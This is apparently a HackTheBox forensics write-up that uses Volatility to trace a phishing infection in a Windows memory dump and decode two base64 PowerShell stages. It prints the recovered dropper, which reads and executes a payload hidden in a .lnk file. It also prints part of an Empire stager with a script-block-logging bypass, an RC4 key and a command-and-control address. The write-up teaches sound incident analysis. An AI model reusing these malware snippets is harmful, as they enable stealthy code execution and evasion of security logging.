$ cat writeup.md…
$ cat writeup.md…
hackthebox
Task: Memory dump from Windows VM with suspicious PowerShell activity after phishing email. Solution: Volatility process/cmdline analysis, decode base64 PowerShell payloads (ASCII and UTF-16LE), find Empire stager with embedded flag.
Suspicious traffic was detected from a recruiter's virtual PC. A memory dump of the offending VM was captured before it was removed from the network for imaging and analysis. Our recruiter mentioned he received an email from someone regarding their resume. A copy of the email was recovered and is provided for reference. Find and decode the source of the malware to find the flag.
flounder-pc-memdump.elf - Memory dump from Windows 7 SP1 x64 VMimageinfo.txt - Volatility profile information (Win7SP1x64)Resume.eml - Recovered email with malicious linkExtracted the challenge archive (password: hackthebox) and examined the files:
http://10.10.99.55:8080/resume.zipThe attack chain becomes clear: phishing email with malicious resume link.
Listed processes from the memory dump using Volatility 3:
vol -f flounder-pc-memdump.elf windows.pslist
Key findings:
| Process | PID | Parent | Time | Notes |
|---|---|---|---|---|
| thunderbird.exe | 2812 | - | - | Email client (opened malicious email) |
| powershell.exe | 496 | explorer.exe | 18:06:58 | First stage payload |
| powershell.exe | 2752 | 496 | 18:07:00 | Second stage (Empire stager) |
The process tree reveals the infection chain: Thunderbird -> Explorer -> PowerShell -> PowerShell
vol -f flounder-pc-memdump.elf windows.cmdline
Found two PowerShell processes with encoded payloads.
The first PowerShell had a base64-encoded command:
powershell.exe -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('...')); iex $r;
Decoded to a dropper script:
$stP,$siP=3230,9676; $f='resume.pdf.lnk'; if(-not(Test-Path $f)){ $x=Get-ChildItem -Path $env:temp -Filter $f -Recurse; [IO.Directory]::SetCurrentDirectory($x.DirectoryName); } $lnk=New-Object IO.FileStream $f,'Open','Read','ReadWrite'; $b64=New-Object byte[]($siP); $lnk.Seek($stP,[IO.SeekOrigin]::Begin); $lnk.Read($b64,0,$siP); $b64=[Convert]::FromBase64CharArray($b64,0,$b64.Length); $scB=[Text.Encoding]::Unicode.GetString($b64); iex $scB;
This reads embedded payload from resume.pdf.lnk at offset 3230 (9676 bytes).
The second PowerShell used -enc parameter with UTF-16LE base64:
echo '...' | base64 -d | iconv -f UTF-16LE -t UTF-8
Decoded to a PowerShell Empire stager with the flag embedded:
# AMSI and Script Block Logging bypass $GroUPPOLiCYSEttINGs = [rEF].ASseMBLY.GEtTypE('System.Management.Automation.Utils')."GEtFIE`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static').GETValUe($nulL); $GRouPPOlICySeTTiNgS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0; # RC4 key and C2 configuration $K=[SYStEM.Text.ENCODIng]::ASCII.GEtBytEs('E1gMGdfT@eoN>x9{]2F7+bsOn4/SiQrw'); $ser='http://10.10.99.55:80'; $t='/login/process.php'; # FLAG embedded in source $flag='HTB{REDACTED}'; # ... RC4 decryption and execution ...
Phishing Email (Resume.eml)
|
v
resume.zip download (http://10.10.99.55:8080/resume.zip)
|
v
resume.pdf.lnk execution
|
v
PowerShell Stage 1 (PID 496) - Dropper
|
v
PowerShell Stage 2 (PID 2752) - Empire Stager
|
v
C2 Communication (10.10.99.55:80)
# List processes vol -f <dump> windows.pslist # Get command lines vol -f <dump> windows.cmdline # Other useful plugins vol -f <dump> windows.pstree # Process tree vol -f <dump> windows.netscan # Network connections vol -f <dump> windows.filescan # File handles vol -f <dump> windows.dumpfiles # Extract files
# ASCII base64 echo '<base64>' | base64 -d # UTF-16LE base64 (PowerShell -enc) echo '<base64>' | base64 -d | iconv -f UTF-16LE -t UTF-8
-enc parameter always uses UTF-16LE encoding$ cat /etc/motd
Liked this one?
Pro unlocks every complete writeup and expanded API access. $9/mo.
$ cat pricing.md$ grep --similar